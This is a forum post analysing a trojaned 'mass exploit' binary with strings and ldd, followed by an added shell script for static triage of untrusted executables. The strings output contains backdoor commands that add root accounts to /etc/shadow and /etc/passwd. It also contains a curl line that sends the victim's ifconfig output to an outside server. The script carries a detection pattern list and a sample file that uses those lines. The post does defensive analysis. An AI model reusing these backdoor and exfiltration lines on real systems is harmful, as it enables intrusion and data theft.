08-28-07, 12:56 PM   #1
evilghost

Watch what you trust.

This event struck me as unusual, so I wanted to share with you why it's normal to be paranoid.

While reading up on my RSS security feeds I found a notification about exploitation of Apache/IMAP, with a link on Security Focus.

http://www.securityfocus.com/archive.../30/0/threaded

The grammatical structure of the message appears odd, to say the least. Checking out the site, there are two gzipped tarballs available for download. One includes the source code as well as a binary; the other is just precompiled binaries.

I wanted to show you how you can use the 'strings' and 'ldd' commands to find information about an executable. Before you run an untrusted executable, especially as root, you had better know for darn sure what it is.

ldd will list the libraries a dynamic executable is compiled against; in this case, the executable wasn't statically compiled.

Code:
luser@meowbox:~/Desktop$ ldd massxpl
        linux-gate.so.1 =>  (0xffffe000)
        libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e10000)
        /lib/ld-linux.so.2 (0xb7f4f000)
Now, look what strings has to say:

Code:
luser@meowbox:~/Desktop$ strings massxpl
/lib/ld-linux.so.2
_Jv_RegisterClasses
__gmon_start__
libc.so.6
recv
connect
snprintf
fgets
puts
getuid
system
socket
select
send
strstr
bcopy
memset
gethostbyname
fclose
getpeername
htons
exit
fopen
_IO_stdin_used
__libc_start_main
fcntl
GLIBC_2.1
GLIBC_2.0
PTRh
Mass Xploitz for Apache and Imap
Apache mod_j/k Fedora Core 6/5 - Debian 3.1 - FreeBSD 5.4REL
Gnu mailutils imap4d Fedora Core 6 - Fedora Core 3
Attacking IMAP server on %s...
Press CTRL+C if you want to skip exploit
./xpl/imapfc3 -h %s
Attacking apache server on %s...
./xpl/apache -t 0 -h %s
perl ./xpl/apache.pl %s 1
./xpl/apache -t 1 -h %s
perl ./xpl/apache.pl %s 2
./xpl/apache -t 2 -h %s
perl ./xpl/apache.pl %s 3
./xpl/apache -t 3 -h %s
socket creation error
can not find host
[ %s ] Port %d (TCP) tertutup
[ %s ] Port %d (TCP) terbuka
Checking for banner...
HEAD / HTTP/1.1
Host:%s
pache
IMAP4rev1
Root priviledge is needed - use your root user OK!
target.txt
Rename your target list filename to target.txt
/etc/shadow
newbie:$1$nLv4Q0aJ$rV4IkBgFH1NMo/HzHX35u/
echo toor:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadowecho newbie:\$1\$nLv4Q0aJ\$rV4IkBgFH1NMo\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow
echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd
echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd
/usr/bin/curl
/usr/bin/curl -d "user=newbie&pass=novice&target=$(ifconfig -a)" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null
Trying to connect to %s port %d
As you can plainly see, the binary wants you to run it as root. When you do, it adds two new users (newbie and toor) to your /etc/shadow file and then to your /etc/passwd file. It then connects to an HTTP server using curl and reports your IP addresses so the malware author can come back and connect to you. (http://www.trancefix.org/hell/save.php)

This is poor-quality code. Several assumptions are made: that curl exists on the system, and that ifconfig will return a non-IANA-reserved address.

Either way, this should serve as a wake-up call: malware authors are everywhere, and they're actively trying to compromise your box. If you're not taking the necessary caution, you'll get owned.

Even if you don't know C, read the source code; unless it's marvelously obfuscated, you should be able to pick out oddities. Don't trust precompiled binaries from untrusted sources.
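The triage described in the post, written up as an added example that is not part of the original post and was not run against the massxpl binary. One change from the post's procedure is worth knowing: the ldd man page warns never to use ldd on an untrusted executable, because on some systems it works by invoking the program's dynamic loader and can end up executing the file; the script below reads the NEEDED entries from the ELF dynamic section with readelf instead, and falls back to a portable tr/grep stand-in for strings(1). The indicator list, the sample file it scans and the function names are all constructed for this example.

```shell
#!/bin/sh
# Added example (not from the original post): static triage of an untrusted
# executable before anyone runs it. Assumes a POSIX shell with tr, grep and
# mktemp; readelf (binutils) is optional. ldd is deliberately NOT used: on some
# systems ldd runs the program's dynamic loader, i.e. it can execute untrusted
# code, so the dependency list is read from the ELF dynamic section instead.
export LC_ALL=C

# Indicators worth a second look among a binary's printable strings. This list
# is constructed for the example and mirrors what the post found; tune it locally.
SUSPECT_PATTERNS='^system$|/etc/shadow|/etc/passwd|/bin/sh|curl|wget|https?://|setuid|execve|ifconfig|^toor|\$1\$'

# Portable stand-in for strings(1): runs of 4+ printable bytes, one per line.
extract_strings() {
    tr -c '[:print:]' '\n' < "$1" | grep -E '^.{4,}$'
}

# Shared-library dependencies from the ELF dynamic section (no code executed).
list_needed() {
    if command -v readelf >/dev/null 2>&1; then
        readelf -d "$1" 2>/dev/null | grep NEEDED \
            || echo "(no NEEDED entries: static, or not an ELF file)"
    else
        echo "(readelf not installed; dependency listing skipped)"
    fi
}

# Number of extracted strings matching SUSPECT_PATTERNS (prints 0 when clean).
suspect_count() {
    extract_strings "$1" | grep -E -c "$SUSPECT_PATTERNS" || true
}

# Human-readable report; returns 1 when the file should not be run as-is.
triage() {
    echo "== $1: NEEDED libraries =="
    list_needed "$1"
    echo "== $1: suspicious strings =="
    matches=$(extract_strings "$1" | grep -E "$SUSPECT_PATTERNS") || true
    if [ -n "$matches" ]; then
        printf '%s\n' "$matches"
        return 1
    fi
    echo "(none)"
    return 0
}

# Constructed stand-in for a compiled binary: NUL-separated strings plus junk
# bytes, carrying the kind of payload the post's strings output showed.
make_sample() {
    printf 'ELF\001\002junk\000libc.so.6\000system\000/etc/shadow\000' > "$1"
    printf 'echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd\000' >> "$1"
    printf '/usr/bin/curl\000Checking for banner...\000' >> "$1"
}

# Constructed clean file: ordinary libc symbol names only.
make_clean_sample() {
    printf 'hello world\000libc.so.6\000puts\000fgets\000' > "$1"
}

sample=$(mktemp)
trap 'rm -f "$sample"' EXIT
make_sample "$sample"
if triage "$sample"; then
    echo "nothing obvious; still read the source before running it"
else
    echo "DO NOT RUN: review the hits above"
fi
```

A clean result from this script is not a clearance: a packed or lightly obfuscated binary will hide every one of these strings, which is exactly why the post's closing advice to read the source (or to build from source yourself) still stands. The script only cheaply catches the sloppy case, which this one was.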